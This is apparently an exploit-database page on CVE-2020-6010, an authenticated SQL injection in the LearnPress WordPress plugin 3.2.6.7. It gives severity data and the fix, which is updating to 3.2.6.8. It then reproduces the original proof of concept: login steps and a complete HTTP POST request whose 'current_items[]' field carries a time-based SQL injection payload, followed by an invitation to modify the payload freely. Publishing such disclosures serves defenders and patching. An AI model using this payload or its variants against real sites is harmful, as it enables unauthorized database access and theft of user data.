WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)

vendor:

LearnPress

by:

nhattruong or nhattruong.blog

8.8

CVSS

HIGH

SQL Injection

CWE

Product Name: LearnPress

Affected Version From: 3.2.6.7

Affected Version To: 3.2.6.7

Patch Exists: YES

Related CWE: CVE-2020-6010

CPE: a:thimpress:learnpress:3.2.6.7

Metasploit:

Other Scripts:

Platforms Tested: WordPress

2021

WordPress Plugin LearnPress 3.2.6.7 – ‘current_items’ SQL Injection (Authenticated)

The WordPress plugin LearnPress version 3.2.6.7 is vulnerable to an authenticated SQL injection vulnerability in the 'current_items' parameter. An attacker with authenticated access can exploit this vulnerability to execute arbitrary SQL queries, potentially leading to unauthorized access or data leakage.

Mitigation:

Update to version 3.2.6.8 or later.

Source

Exploit-DB raw data:

# Exploit Title: WordPress Plugin LearnPress 3.2.6.7 - 'current_items' SQL Injection (Authenticated)
# Date: 07-17-2021
# Exploit Author: nhattruong or nhattruong.blog
# Vendor Homepage: https://thimpress.com/learnpress/
# Software Link: https://wordpress.org/plugins/learnpress/
# Version: < 3.2.6.8
# References link: https://wpscan.com/vulnerability/10208
# CVE: CVE-2020-6010

POC:
1. Go to url http://<host>/wp-admin
2. Login with a cred
3. Execute the payload


POST /wordpress/wp-admin/post-new.php?post_type=lp_order HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:89.0) Gecko/20100101 Firefox/89.0
Accept: application/json, text/plain, */*
Accept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
Referer: http://localhost/wordpress/wp-admin/post-new.php?post_type=lp_order
Content-Type: application/x-www-form-urlencoded
X-Requested-With: XMLHttpRequest
Content-Length: 128
Origin: http://localhost
Connection: close
Cookie: wordpress_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Cf0e96afd20e39e4531756b321160a4929f82f20a3fed8d3c3b682e0ece232e08; wordpress_test_cookie=WP+Cookie+check; wp_learn_press_session_bbfa5b726c6b7a9cf3cda9370be3ee91=80e1cb27266ae862f9e71f90a987f260%7C%7C1626703938%7C%7Cbd6b88d1ae5fd4354f09534ad4971bbc; wordpress_logged_in_bbfa5b726c6b7a9cf3cda9370be3ee91=test%7C1626703944%7Ch5yJTmZF2VUp6nuZHvt3WpWHJOGpYRUwaDfRNLd8N3x%7Ce1092ef2869397bd9701ca7f1c6d0399c89459f5221db89c48a53b39b3e8cc2f; wp-settings-time-3=1626531145

type=lp_course&context=order-items&context_id=32&term=+test&paged=1&lp-ajax=modal_search_items&current_items[]=1 or sleep(1)-- -

# Modify current_items[] as you want